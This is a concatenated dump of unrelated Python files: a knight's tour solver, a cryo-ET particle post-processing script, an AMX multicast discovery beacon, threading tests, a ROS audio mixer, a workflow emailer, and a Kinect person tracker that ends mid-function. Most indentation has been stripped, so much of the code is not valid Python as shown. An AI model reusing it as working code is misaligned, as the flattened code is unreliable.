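# current square is scored by how many onward moves it would leave (ctr), and
# a min-heap picks the move with the fewest onward options.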
def solve(self):
kx = random.randint(0, self.n - 1)
ky = random.randint(0, self.n - 1)
dx = [-2, -1, 1, 2, -2, -1, 1, 2]
dy = [1, 2, 2, 1, -1, -2, -2, -1]
for k in range(self.n ** 2):
if not self.running:
break
self.operations+=1
self.cb[ky][kx] = k + 1
self.ans.append([kx, ky])
self.show()
if not self.running:
break
time.sleep(1/self.speed)
pq = []
for i in range(8):
self.operations+=1
if not self.running:
break
nx = kx + dx[i]
ny = ky + dy[i]
if 0 <= nx < self.n and 0 <= ny < self.n:
if self.cb[ny][nx] == 0:
ctr = 0
for j in range(8):
self.operations+=1
if not self.running:
break
ex = nx + dx[j]
ey = ny + dy[j]
if 0 <= ex < self.n and 0 <= ey < self.n:
if self.cb[ey][ex] == 0: ctr += 1
heappush(pq, (ctr, i))
if len(pq) > 0:
(p, m) = heappop(pq)
kx += dx[m]
ky += dy[m]
else:
break
if self.running:
ExtraWidgits.OperationsDoneKnight(self.operations, self.win, 700, 400, "Knight's Tour Completed.")
Knight_Tour.RunClock=False
self.WaitForEndProcess=False
return True
|
post_rec_particles.py
|
"""
Script for post-processing already reconstructed particles
Input: - STAR file with next columns:
'_rlnMicrographName': tomogram that will be used for reconstruction
'_rlnImageName': tomograms used for picking
'_rlnCtfImage': (optional) CTF model subvolume
'_psSegImage': (optional) mask for particles within the reconstructed tomograms
'_rlnCoordinate{X,Y,Z}': {X,Y,Z} coordinates in Relion format
'_rlnAngle{Rot,Tilt,Psi}': (optional) {Rot,Tilt,Psi} angles
- Output paths
- Post-processing settings
Output: - Particles sub-volumes are post-processed and restored
- A new STAR file
"""
__author__ = 'Antonio Martinez-Sanchez'
# ################ Package import
import gc
import os
import sys
import time
import copy
import pyto
import random
import pyseg as ps
import numpy as np
import multiprocessing as mp
from pyseg.globals import tomo_shift, get_sub_copy
from pyseg import sub, pexceptions
########## Global variables
ANGLE_NAMES = ['Rot', 'Tilt', 'Psi']
########################################################################################
# PARAMETERS
########################################################################################
####### Input data
ROOT_PATH = '/fs/pool/pool-lucic2/antonio/workspace/psd_an/ex/syn2'
# Input STAR file
in_star = ROOT_PATH + '/org/pst/ltomos/ltomos_all_pst_subclean/7_parts.star' # '/rln/ref_model/run3_c1_LB_mb_data_prior.star' # '/rln/pst/class_blob_h_v6/run17_c1_it050_data_c1_prior_clean.star' # '/rln/pre/root_v5_rot_rnd_prior.star'
in_mask = ROOT_PATH + '/masks/mask_cyl_64_35_48_15_r.mrc' # '/masks/mask_cyl_64_34_50_12.mrc' # '/masks/mask_cyl_64_35_52_10_r.mrc' # '/masks/mask_cyl_64_15_50_15.mrc'
####### Output data
out_part_dir = ROOT_PATH + '/rec/pst/particles_lab_c2_v6_nomb_post' # '/rec/col/LB_cyto' # '/rec/pst/particles_blob_ha_v6_nomb_post'
out_star = ROOT_PATH + '/rec/pst/particles_lab_c2_v6_nomb_post.star' # '/rec/col/LB_cyto_post.star' # '/rec/pst/blob_ha_class_run17_nomb_post.star'
####### Particles pre-processing settings
do_ang_prior = ['Tilt', 'Psi', 'Rot'] # ['Rot', 'Tilt', 'Psi']
do_ang_rnd = [] # ['Rot']
####### Multiprocessing settings
mp_npr = 1 # 10
########################################################################################
# Local functions
########################################################################################
class Settings(object):
out_part_dir = None
out_star = None
do_ang_prior = None
do_ang_rnd = None
in_mask = None
def pr_worker(pr_id, star, sh_star, rows, settings, qu):
"""
Function which implements the functionality of the parallel workers.
Each worker processes a pre-split set of rows of the Star object
:param pr_id: process ID
:param star: Star object with input information
:param sh_star: shared output Star object
:param rows: list with Star rows to process for the worker
:param settings: object with the settings
:param qu: queue to store the output Star object
:return: stores the post-processed particles on disk and inserts the corresponding entries in the
output Star object, which is put on the queue
"""
# Initialization
out_part_dir = settings.out_part_dir
do_ang_prior = settings.do_ang_prior
do_ang_rnd = settings.do_ang_rnd
in_mask = settings.in_mask
rln_star = copy.deepcopy(sh_star)
mask = ps.disperse_io.load_tomo(in_mask, mmap=False)
# print '\tLoop for particles: '
count, n_rows = 0, len(rows)
for row in rows:
# print '\t\t\t+Reading the entry...'
in_pick_tomo = star.get_element('_rlnImageName', row)
in_rec_tomo = star.get_element('_rlnMicrographName', row)
in_ctf = star.get_element('_rlnCtfImage', row)
x_pick = star.get_element('_rlnCoordinateX', row)
y_pick = star.get_element('_rlnCoordinateY', row)
z_pick = star.get_element('_rlnCoordinateZ', row)
try:
shift_x = star.get_element('_rlnOriginX', row)
except KeyError:
shift_x = 0
try:
shift_y = star.get_element('_rlnOriginY', row)
except KeyError:
shift_y = 0
try:
shift_z = star.get_element('_rlnOriginZ', row)
except KeyError:
shift_z = 0
rot = star.get_element('_rlnAngleRot', row)
tilt = star.get_element('_rlnAngleTilt', row)
psi = star.get_element('_rlnAnglePsi', row)
rot_prior, tilt_prior, psi_prior = None, None, None
if ANGLE_NAMES[0] in do_ang_prior:
rot_prior = rot
if ANGLE_NAMES[0] in do_ang_rnd:
rot = 180. * random.random()
if ANGLE_NAMES[1] in do_ang_prior:
tilt_prior = tilt
if ANGLE_NAMES[1] in do_ang_rnd:
tilt = 180. * random.random()
if ANGLE_NAMES[2] in do_ang_prior:
psi_prior = psi
if ANGLE_NAMES[2] in do_ang_rnd:
psi = 180. * random.random()
        angs = np.asarray((rot, tilt, psi), dtype=float)
# Sub-volumes post-processing
svol = ps.disperse_io.load_tomo(in_pick_tomo, mmap=False)
r3d = pyto.geometry.Rigid3D()
r3d.q = r3d.make_r_euler(angles=np.radians(angs), mode='zyz_in_active')
if (shift_x != 0) or (shift_y != 0) or (shift_z != 0):
svol = tomo_shift(svol, (shift_y, shift_x, shift_z))
        svol_sp = np.asarray(svol.shape, dtype=int)
svol_cent = np.asarray((int(.5 * svol_sp[0]), int(.5 * svol_sp[1]), int(.5 * svol_sp[2])), dtype=np.float32)
svol = r3d.transformArray(svol, origin=svol_cent, order=3, prefilter=True)
stat_vol = svol[mask > 0]
mn, st = stat_vol.mean(), stat_vol.std()
if st > 0:
svol = (svol - mn) / st
svol = ps.globals.randomize_voxel_mask(svol, mask, ref='fg')
r3d_inv = pyto.geometry.Rigid3D()
r3d_inv.q = r3d.make_r_euler(angles=np.radians(angs), mode='zyz_in_passive')
svol = r3d_inv.transformArray(svol, origin=svol_cent, order=3, prefilter=True)
if (shift_x != 0) or (shift_y != 0) or (shift_z != 0):
svol = tomo_shift(svol, (-shift_y, -shift_x, -shift_z))
# Adding entry to particles STAR file
out_part = out_part_dir + '/' + os.path.splitext(os.path.split(in_pick_tomo)[1])[0] + '.mrc'
ps.disperse_io.save_numpy(svol, out_part)
# Writing in the shared object
print('\t\t-Process[' + str(pr_id) + '], Particle [' + str(count) + '/' + str(n_rows) + ']: ' + out_part)
part_row = {'_rlnMicrographName': in_rec_tomo,
'_rlnCtfImage': in_ctf,
'_rlnImageName': out_part,
'_rlnCoordinateX': x_pick,
'_rlnCoordinateY': y_pick,
'_rlnCoordinateZ': z_pick,
'_rlnOriginX': shift_x,
'_rlnOriginY': shift_y,
'_rlnOriginZ': shift_z}
part_row['_rlnAngleRot'] = rot
part_row['_rlnAngleTilt'] = tilt
part_row['_rlnAnglePsi'] = psi
if ANGLE_NAMES[0] in do_ang_prior:
part_row['_rlnAngleRotPrior'] = rot_prior
if ANGLE_NAMES[1] in do_ang_prior:
part_row['_rlnAngleTiltPrior'] = tilt_prior
if ANGLE_NAMES[2] in do_ang_prior:
part_row['_rlnAnglePsiPrior'] = psi_prior
rln_star.add_row(**part_row)
count += 1
# Finishing the process
qu.put(rln_star)
sys.exit(pr_id)
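# --- Hedged sketch (not part of the original script) ---
# Compact view of the core step inside pr_worker(): rotate the sub-volume into the
# reference frame, z-score the voxels under the mask, then rotate back. It assumes
# the same pyto Rigid3D API called above; nothing here is executed by the script.
def _example_rotate_normalize(svol, mask, angs_deg):
    cent = np.asarray([.5 * s for s in svol.shape], dtype=np.float32)
    r3d = pyto.geometry.Rigid3D()
    r3d.q = r3d.make_r_euler(angles=np.radians(angs_deg), mode='zyz_in_active')
    hold = r3d.transformArray(svol, origin=cent, order=3, prefilter=True)
    vals = hold[mask > 0]
    if vals.std() > 0:
        hold = (hold - vals.mean()) / vals.std()
    r3d_inv = pyto.geometry.Rigid3D()
    r3d_inv.q = r3d_inv.make_r_euler(angles=np.radians(angs_deg), mode='zyz_in_passive')
    return r3d_inv.transformArray(hold, origin=cent, order=3, prefilter=True)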
########################################################################################
# MAIN ROUTINE
########################################################################################
# Print initial message
print('Post-processing reconstructed particles.')
print('\tAuthor: ' + __author__)
print('\tDate: ' + time.strftime("%c") + '\n')
print('Options:')
print('\tInput STAR file: ' + in_star)
print('\tInput mask: ' + in_mask)
print('\tOutput directory for reconstructed particles: ' + out_part_dir)
print('\tOutput STAR file: ' + out_star)
print('\tParticles pre-processing settings: ')
if len(do_ang_prior) > 0:
for ang_prior in do_ang_prior:
if ang_prior not in ['Rot', 'Tilt', 'Psi']:
print('ERROR: unrecognized angle: ' + ang_prior)
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
print('\t\t-Adding prior for angles: ' + ang_prior)
if len(do_ang_rnd) > 0:
for ang_rnd in do_ang_rnd:
if ang_rnd not in ['Rot', 'Tilt', 'Psi']:
print('ERROR: unrecognized angle: ' + ang_rnd)
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
print('\t\t-Setting random values for angles: ' + ang_rnd)
print('\tMultiprocessing settings: ')
print('\t\t-Number processes: ' + str(mp_npr))
print('')
print('Loading input STAR file...')
star, rln_star = sub.Star(), sub.Star()
try:
star.load(in_star)
except pexceptions.PySegInputError as e:
print('ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"')
print('Terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if not os.path.exists(out_part_dir):
os.makedirs(out_part_dir)
print('\tInitializing output Relion STAR file: ')
rln_star.add_column(key='_rlnMicrographName')
rln_star.add_column(key='_rlnCtfImage')
rln_star.add_column(key='_rlnImageName')
rln_star.add_column(key='_rlnCoordinateX')
rln_star.add_column(key='_rlnCoordinateY')
rln_star.add_column(key='_rlnCoordinateZ')
rln_star.add_column(key='_rlnOriginX')
rln_star.add_column(key='_rlnOriginY')
rln_star.add_column(key='_rlnOriginZ')
if ANGLE_NAMES[0] in do_ang_prior:
if star.has_column(key='_rlnAngleRot'):
rln_star.add_column(key='_rlnAngleRot')
rln_star.add_column(key='_rlnAngleRotPrior')
else:
        print('ERROR: Prior Rot angle cannot be added since there is no Rot angle column in the input STAR file.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if ANGLE_NAMES[1] in do_ang_prior:
if star.has_column(key='_rlnAngleTilt'):
rln_star.add_column(key='_rlnAngleTilt')
rln_star.add_column(key='_rlnAngleTiltPrior')
else:
        print('ERROR: Prior Tilt angle cannot be added since there is no Tilt angle column in the input STAR file.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if ANGLE_NAMES[2] in do_ang_prior:
if star.has_column(key='_rlnAnglePsi'):
rln_star.add_column(key='_rlnAnglePsi')
rln_star.add_column(key='_rlnAnglePsiPrior')
else:
        print('ERROR: Prior Psi angle cannot be added since there is no Psi angle column in the input STAR file.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if ANGLE_NAMES[0] in do_ang_rnd:
if not rln_star.has_column(key='_rlnAngleRot'):
rln_star.add_column(key='_rlnAngleRot')
if ANGLE_NAMES[1] in do_ang_rnd:
if not rln_star.has_column(key='_rlnAngleTilt'):
rln_star.add_column(key='_rlnAngleTilt')
if ANGLE_NAMES[2] in do_ang_rnd:
if not rln_star.has_column(key='_rlnAnglePsi'):
rln_star.add_column(key='_rlnAnglePsi')
print('\tInitializing multiprocessing with ' + str(mp_npr) + ' processes: ')
settings = Settings()
settings.out_part_dir = out_part_dir
settings.out_star = out_star
settings.in_mask = in_mask
settings.do_ang_prior = do_ang_prior
settings.do_ang_rnd = do_ang_rnd
processes = list()
qu = mp.Queue()
spl_ids = np.array_split(list(range(star.get_nrows())), mp_npr)
# Starting the processes
for pr_id in range(mp_npr):
pr = mp.Process(target=pr_worker, args=(pr_id, star, rln_star, spl_ids[pr_id], settings, qu))
pr.start()
processes.append(pr)
# Getting processes results
pr_results, stars = list(), list()
for pr in processes:
stars.append(qu.get())
for pr_id, pr in enumerate(processes):
pr.join()
pr_results.append(pr.exitcode)
if pr_id != pr_results[pr_id]:
print('ERROR: Process ' + str(pr_id) + ' ended incorrectly.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
gc.collect()
# Merging output STAR files
rln_merged_star = sub.Star()
keys = stars[0].get_column_keys()
for key in keys:
rln_merged_star.add_column(key)
for star in stars:
for row in range(star.get_nrows()):
hold_row = dict()
for key in keys:
hold_row[key] = star.get_element(key, row)
rln_merged_star.add_row(**hold_row)
print('\tStoring output STAR file in: ' + out_star)
rln_merged_star.store(out_star)
print('Successfully terminated. (' + time.strftime("%c") + ')')
|
beacon.py
|
import logging
import os
import re
import uuid
import time
import threading
import socket
import util
log = logging.getLogger(__name__)
MULTICAST_PORT = 9131
MULTICAST_IP = '239.255.250.250'
MULTICAST_TTL = int(os.getenv('IP2SL_BEACON_HOPS', 2)) # after TWO network hops the beacon packet should be discarded
# Implements a version of the AMX Beacon device discovery protocol with periodic heartbeats
class AMXDiscoveryBeacon():
def __init__(self, config):
self._config = config
# heartbeat interval in seconds (default is every 10 seconds); ENV override for testing
self._beacon_interval = max(1, int(os.getenv('IP2SL_BEACON_INTERVAL', '10')))
self._console_host = util.get_host(config)
self._console_port = int(os.getenv('IP2SL_CONSOLE_PORT', 4444))
self._thread = threading.Thread(target=self.heartbeat, args=())
self._thread.daemon = True
self._thread.start()
def get_mac(self):
return ''.join(re.findall('..', '%012x' % uuid.getnode())).upper()
def heartbeat(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, MULTICAST_TTL)
        # The iTach Flex discovery beacon is an AMX-style multicast UDP packet sent to IP 239.255.250.250, port 9131.
data = {
'UUID' : f"VirtualIP2SL_{self.get_mac()}", # required; unique identifer for this instance
'SDKClass' : 'Utility', # required
'Make' : 'GlobalCache', # required
'Model' : 'iTachFlexEthernet', # required; note GC-100-12 for legacy model, or iTachIP2SL for v1.5 API
# 'Config-URL' : f"http://{self._console_host}:{self._console_port}",
'Revision' : '710-3000-18',
'Pkg_Level' : '', # "GCPK001",
'PCB_PN' : '025-0034-12',
'Status' : 'Ready'
}
heartbeat_packet = "AMXB" + ''.join(F"<-{k}={v}>" for (k,v) in data.items())
while True:
log.debug(f"Broadcasting heartbeat beacon to {MULTICAST_IP}:{MULTICAST_PORT}: {heartbeat_packet}")
heartbeat_packet += "\r"
sock.sendto(heartbeat_packet.encode(), (MULTICAST_IP, MULTICAST_PORT))
time.sleep(self._beacon_interval)
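# --- Hedged sketch (not part of the original module) ---
# Illustration of how a receiver could parse the AMXB heartbeat packet built in
# heartbeat() above: the literal "AMXB" prefix followed by "<-key=value>" pairs.
def parse_beacon_packet(packet: str) -> dict:
    if not packet.startswith("AMXB"):
        raise ValueError("not an AMX beacon packet")
    return dict(re.findall(r"<-([^=>]+)=([^>]*)>", packet))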
|
test_thread.py
|
import contextvars
import operator
import threading
import time
import pytest
from threadlet import Future, TimeoutError
from threadlet.thread import Thread
from threadlet.utils import FuturedFunc
NUMBERS = [1, 2]
EXPECTED_RES = sum(NUMBERS)
ctx_var: contextvars.ContextVar = contextvars.ContextVar("ctx_var")
def test_thread_submit_success0():
t = Thread(target=sum, args=(NUMBERS,))
t.start()
try:
assert t.future.result(1) == EXPECTED_RES
finally:
t.join()
with pytest.raises(AttributeError):
t.future.result(1)
assert threading.active_count() == 1
def test_thread_submit_success1():
with Thread(target=sum, args=(NUMBERS,)) as t:
assert t.future.result(1) == EXPECTED_RES
assert threading.active_count() == 1
def test_thread_submit_success2():
with Thread.submit(sum, NUMBERS) as t:
assert t.future.result(1) == EXPECTED_RES
assert threading.active_count() == 1
def test_thread_submit_no_future():
with Thread.submit(time.sleep, 1):
assert threading.active_count() == 2
assert threading.active_count() == 1
def test_thread_submit_error():
numbers = [1, 0]
with Thread.submit(operator.truediv, *numbers) as t:
with pytest.raises(ZeroDivisionError):
t.future.result(1)
assert threading.active_count() == 1
def test_thread_submit_timeout():
with Thread.submit(time.sleep, 2) as t:
with pytest.raises(TimeoutError):
t.future.result(timeout=1)
assert t.future.result(2) is None
assert threading.active_count() == 1
def test_contextvar_success():
x = 1
ctx_var.set(x)
with Thread.submit(target=ctx_var.get) as t:
assert t.future.result(1) == x
def test_contextvar_error():
f = Future()
ctx_var.set(1)
t = threading.Thread(target=FuturedFunc(f, ctx_var.get))
t.start()
with pytest.raises(LookupError):
f.result(1)
del f
t.join(1)
assert not t.is_alive()
|
opentera_webrtc_audio_mixer.py
|
#!/usr/bin/env python3
# PYTHONPATH is set properly when loading a workspace.
# This package needs to be installed first.
import pyaudio
import numpy
import threading
from datetime import datetime, timedelta
import queue
# ROS
import rospy
from opentera_webrtc_ros_msgs.msg import PeerAudio
p = pyaudio.PyAudio()
output_device_index = 0
class AudioWriter:
def __init__(self, peer_id: str):
self._peer_id = peer_id
self._audio_queue = queue.Queue()
self._quit_event = threading.Event()
self._thread = threading.Thread(target=self._run)
self._lastPushTime = datetime.now()
def get_last_push(self):
return self._lastPushTime
def push_audio(self, audio: PeerAudio, timeout=None):
self._audio_queue.put(audio, timeout=timeout)
# print('PUSH', datetime.now().timestamp(), self._audio_queue.qsize())
self._lastPushTime = datetime.now()
def pull_audio(self, timeout=None):
audio = self._audio_queue.get(timeout=timeout)
# print('PULL', datetime.now().timestamp(), self._audio_queue.qsize())
return audio
def _run(self):
print('Thread_run', self._peer_id)
stream = None
while not self._quit_event.isSet():
try:
# Write data (should get 10ms frames)
audio = self.pull_audio(timeout=0.010)
if audio:
if audio.frame.format == 'signed_16':
if stream is None:
stream = p.open(format=pyaudio.paInt16,
channels=audio.frame.channel_count,
rate=audio.frame.sampling_frequency,
output_device_index=output_device_index,
frames_per_buffer=int(audio.frame.frame_sample_count * 20),
output=True)
# Fill buffer with zeros ?
# for _ in range(10):
# stream.write(numpy.zeros(audio.frame.frame_sample_count, dtype=numpy.int16))
stream.write(audio.frame.data)
else:
print('Unsupported format: ', audio.frame.format, self._peer_id)
except queue.Empty as e:
# An exception will occur when queue is empty
pass
if stream:
stream.close()
print('Thread done!', self._peer_id)
def start(self):
self._quit_event.clear()
self._thread.start()
def stop(self):
if self._thread.is_alive():
self._quit_event.set()
print('Waiting for thread', self._peer_id)
self._thread.join()
class AudioMixerROS:
def __init__(self):
self._subscriber = rospy.Subscriber('/webrtc_audio', PeerAudio, self._on_peer_audio, queue_size=100)
self._writers = dict()
# Cleanup timer every second
self._timer = rospy.Timer(rospy.Duration(1), self._on_cleanup_timeout)
def shutdown(self):
self._timer.shutdown()
for writer in self._writers:
print('stopping writer', writer)
self._writers[writer].stop()
def _on_cleanup_timeout(self, event):
# Cleanup old threads ...
peers_to_delete = []
# Store since we cannot remove while iterating
for peer_id in self._writers:
if self._writers[peer_id].get_last_push() + timedelta(seconds=15) < datetime.now():
peers_to_delete.append(peer_id)
# Remove old peers
for peer in peers_to_delete:
self._writers[peer].stop()
del self._writers[peer]
def _on_peer_audio(self, audio: PeerAudio):
peer_id = audio.sender.id
if peer_id not in self._writers:
# Create new writer thread
writer = AudioWriter(peer_id)
self._writers[peer_id] = writer
# Start thread
writer.start()
# Push audio
self._writers[peer_id].push_audio(audio)
if __name__ == '__main__':
for index in range(p.get_device_count()):
info = p.get_device_info_by_index(index)
if info['name'] == 'default':
output_device_index = info['index']
# Init ROS
rospy.init_node('opentera_webrtc_audio_mixer', anonymous=True)
mixer = AudioMixerROS()
rospy.spin()
mixer.shutdown()
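# --- Hedged sketch (not part of the original node) ---
# Helper mirroring the device-selection loop in the main block above: return the
# PyAudio index of the first output device whose name matches, or None if absent.
def find_output_device_index(pa_instance, name='default'):
    for idx in range(pa_instance.get_device_count()):
        info = pa_instance.get_device_info_by_index(idx)
        if info['name'] == name:
            return info['index']
    return None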
|
email.py
|
import logging
import urllib
from textwrap import dedent
from mailer import Mailer, Message
from retrying import retry
from dart.model.exception import DartEmailException
from dart.context.locator import injectable
from dart.util.config import _get_dart_host
from Queue import Queue
from threading import Thread
_logger = logging.getLogger(__name__)
@injectable
class Emailer(object):
def __init__(self, dart_config):
email_config = dart_config['email']
self._env_name = dart_config['dart']['env_name'].upper()
self._mailer = Mailer(**email_config['mailer'])
self._from = email_config['from']
self._cc_on_error = email_config['cc_on_error']
self._debug = email_config.get('debug', False)
self._suppress_send = email_config.get('suppress_send', False)
self._dart_host = _get_dart_host(dart_config)
# We have one mailer being used in trigger_listener
self._email_queue = Queue(maxsize=1000) # we should not have that many emails pending to be sent
email_worker = Thread(target=self.send_queued_email_runner, args=(self._email_queue,))
email_worker.setDaemon(True) # we run in a container, when it exits this thread will exit too.
email_worker.start()
def get_entity_link(self, entity, action_id):
origin_param = '["id=%s"]' %(action_id)
converted_param = urllib.quote(origin_param, safe='')
path = 'https://%s/#/entities/%s?f=' % (self._dart_host, entity)
return path + converted_param
def get_workflow_manager_link(self, workflow_id):
return 'https://%s/#/managers/workflow?id=%s&t=wf' % (self._dart_host, workflow_id)
@staticmethod
@retry(wait_fixed=10000, stop_max_attempt_number=12)
# we experience occasional gmail API issues, so we will retry a few times
def send_queued_email(args):
msg = args.get('msg')
_logger.info("Mailer Thread: message= {to}, {subject}, {body}".format(to=msg.To, subject=msg.Subject, body=msg.Body))
        args.get('mail_sender', lambda x, y: None)(msg, args.get('debug'))
@staticmethod
def send_queued_email_runner(q):
while True:
args = q.get()
try:
Emailer.send_queued_email(args)
            except Exception as err:
                _logger.error("Failed to send email {0}: {1}".format(args.get('msg'), err))
q.task_done()
def send_email(self, subject, body, to, cc=None):
msg = Message(From=self._from, To=to, Subject=self._env_name + ' - ' + subject, Body=body, CC=cc)
if self._suppress_send:
_logger.info('email suppressed: subject=%s' % msg.Subject)
return
self._email_queue.put({
'msg': msg,
'mail_sender': self._mailer.send,
'debug': self._debug
})
def send_error_email(self, subject, body, to=None):
cc = None
if to:
cc = self._cc_on_error
else:
to = self._cc_on_error
self.send_email(subject, body, to, cc=cc)
def extract_action_messages(self, action, datastore):
values = dict(action_id=action.id,
action_type_name=action.data.action_type_name,
datastore_id=datastore.id,
datastore_name=datastore.data.name,
entity_link='',
action_err_msg=action.data.error_message,
action_batch_job_id=action.data.batch_job_id,
action_ecs_task_arn=action.data.ecs_task_arn,
workflow_id=action.data.workflow_id,
workflow_instance_id=action.data.workflow_instance_id,
engine_name=action.data.engine_name)
subject = '{action_status} Dart: action (action_id={action_id}, action_type_name={action_type_name})'
message = """
action (action_id={action_id}, action_type_name={action_type_name}) {action_status}
for datastore (datastore_id={datastore_id}, datastore_name={datastore_name})
{entity_link}
action_err_msg={action_err_msg}
workflow_id={workflow_id}, workflow_instance_id={workflow_instance_id}
batch_job_id={action_batch_job_id}, action_ecs_task_arn={action_ecs_task_arn}, engine={engine_name}"""
return (values, subject, message)
def send_action_failed_email(self, action, datastore):
values, subject, message = self.extract_action_messages(action, datastore)
values.update({'action_status': 'FAILED'})
values.update({'entity_link': self.get_entity_link('actions', action.id)})
self.send_error_email(
subject.format(**values),
dedent(message.format(**values)),
action.data.on_failure_email
)
def send_action_completed_email(self, action, datastore):
values, subject, message = self.extract_action_messages(action, datastore)
values.update({'action_status': 'COMPLETED'})
self.send_email(
subject.format(**values),
dedent(message.format(**values)),
action.data.on_success_email
)
def send_workflow_failed_email(self, workflow, wf_instance):
values = (workflow.id, workflow.data.name, wf_instance.id, self.get_workflow_manager_link(workflow.id),
wf_instance.data.error_message)
self.send_error_email(
'FAILED Dart: workflow (id=%s, name=%s)' % (workflow.id, workflow.data.name),
'workflow (id=%s, name=%s) FAILED for instance (id=%s)\n\n%s\n\n%s' % values,
workflow.data.on_failure_email
)
def send_workflow_completed_email(self, workflow, wf_instance):
values = (workflow.id, workflow.data.name, wf_instance.id, self.get_workflow_manager_link(workflow.id))
self.send_email(
'COMPLETED Dart: workflow (id=%s, name=%s)' % (workflow.id, workflow.data.name),
'workflow (id=%s, name=%s) COMPLETED for instance (id=%s)\n\n%s' % values,
workflow.data.on_success_email
)
def send_workflow_started_email(self, workflow, wf_instance):
values = (workflow.id, workflow.data.name, wf_instance.id, self.get_workflow_manager_link(workflow.id))
self.send_email(
'STARTED Dart: workflow (id=%s, name=%s)' % (workflow.id, workflow.data.name),
'workflow (id=%s, name=%s) has STARTED: instance (id=%s)\n\n%s' % values,
workflow.data.on_started_email
)
def send_subscription_failed_email(self, subscription):
values = (subscription.id, subscription.data.name, self.get_entity_link('subscriptions', subscription.id))
self.send_error_email(
'FAILED Dart: subscription (id=%s, name=%s)' % (subscription.id, subscription.data.name),
'subscription (id=%s, name=%s) FAILED\n\n%s' % values,
subscription.data.on_failure_email
)
def send_subscription_completed_email(self, subscription):
values = (subscription.id, subscription.data.name, self.get_entity_link('subscriptions', subscription.id))
self.send_email(
'COMPLETED Dart: subscription (id=%s, name=%s)' % (subscription.id, subscription.data.name),
'subscription (id=%s, name=%s) COMPLETED\n\n%s' % values,
subscription.data.on_success_email
)
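# --- Hedged sketch (not part of the original module) ---
# Minimal illustration of the queue/worker pattern used by Emailer above: messages
# are put on a bounded queue and drained by a single daemon thread, so callers
# never block on the (retried) send itself. This helper is never called by the module.
def _example_queue_worker_pattern():
    q = Queue(maxsize=10)

    def worker(queue):
        while True:
            item = queue.get()
            try:
                _logger.info('would send: %s', item)
            finally:
                queue.task_done()

    t = Thread(target=worker, args=(q,))
    t.setDaemon(True)
    t.start()
    q.put({'msg': 'example message'})
    q.join()  # returns once the worker has marked the queued item as done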
|
personTracking.py
|
#NAME: personTracking.py
#DATE: 08/02/2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python class for tracking people data streamed from a kinect camera
#COPY: Copyright 2018, All Rights Reserved, Ryan McCartney
import threading
import numpy as np
import cv2 as cv
import time
import math
import imutils
import numba as nb
from datetime import datetime
from urllib.request import urlopen
from imutils.object_detection import non_max_suppression
from control import Control
from imutils import paths
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class PersonTracking:
frameWidth = 640
green = (0,255,0)
red = (0,0,255)
blue = (255,0,0)
purple = (205,50,219)
def __init__(self,configuration):
self.status = True
#Load Configuration Variables
try:
self.kinectDepth_url = configuration['streams']['kinectDepth']['url']
self.kinectDepth_name = configuration['streams']['kinectDepth']['name']
self.kinectImage_url = configuration['streams']['kinectRGB']['url']
self.kinectImage_name = configuration['streams']['kinectRGB']['name']
self.webcam_url = configuration['streams']['webcam']['url']
            self.webcam_name = configuration['streams']['webcam']['name']
self.fps = configuration['general']['fps']
self.maxSpeed = configuration['control']['maxSpeed']
self.minAngle = configuration['control']['minAngle']
self.maxAngle = configuration['control']['maxAngle']
#Get the details of the log file from the configuration
logFilePath = configuration['general']['logFileDirectory']
logFileName = configuration['general']['logFileName']
self.logFileFullPath = logFilePath + logFileName
self.logging = True
#Open log file
try:
self.log("INFO = Person Tracking Class has accessed log file.")
except:
self.logging = False
except:
self.log("ERROR = The configuration file cannot be decoded.")
self.status = False
#Try Initialising the control class
try:
self.wheelchair = Control(configuration)
self.log("INFO = Control Established.")
except:
self.log("ERROR = Control Class could not be initiated.")
self.status = False
#Initialising some options with Default values
self.collisionDetection = False
self.retrieveFrames = False
self.tracking = False
self.nms = True
self.displayStream = True
self.showClock = False
self.showFPS = False
self.info = False
#Initialize the HOG descriptor/person detector
self.hog = cv.HOGDescriptor()
self.hog.setSVMDetector(cv.HOGDescriptor_getDefaultPeopleDetector())
#Allow opencv to capture the stream
self.image = cv.VideoCapture(self.kinectImage_url)
self.depth = cv.VideoCapture(self.kinectDepth_url)
def log(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.logFileFullPath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
print(logEntry)
@threaded
def trackPeople(self):
command = "SEND"
self.retrieveFrames = True
delay = 1/self.fps
self.fpsProcessing = 0
self.tracking = True
while self.tracking:
#Start Timing
start = time.time()
imageFrame, depthFrame = self.getFrames()
#Detect People
boundingBoxes, personCentres = self.detectPeople(imageFrame)
#Add Bounding Boxes
frame = self.addBoundingBoxes(imageFrame,boundingBoxes,self.green)
#Add the Goal Position
frame, goalPosition = self.addGoal(frame,self.purple)
if len(boundingBoxes) > 0:
self.log("INFO = Tacking "+str(len(boundingBoxes))+" people.")
frame = self.addText(frame,"Tracking Active",self.red)
#Add Crosshair Markers
frame = self.addMarker(frame,personCentres,self.green)
#In an image with multiple people select a person to follow
personPosition, boundingBox = self.selectPerson(boundingBoxes, personCentres)
#Add Crosshair and Bounding Box for Target person
frame = self.addMarker(frame,[personPosition],self.red)
frame = self.addBoundingBoxes(frame,[boundingBox],self.red)
#Determine Image Size
width = frame.shape[1]
height = frame.shape[0]
speed = self.calcSpeed(personPosition,depthFrame)
angle = self.calcAngle(goalPosition,personPosition,height,width)
#Collision Prevention
if self.collisionDetection == True:
frame = self.collisionPrevention(frame,depthFrame)
text = "Speed adjusted to "+str(speed)+" and angle to "+str(angle)
font = cv.FONT_HERSHEY_SIMPLEX
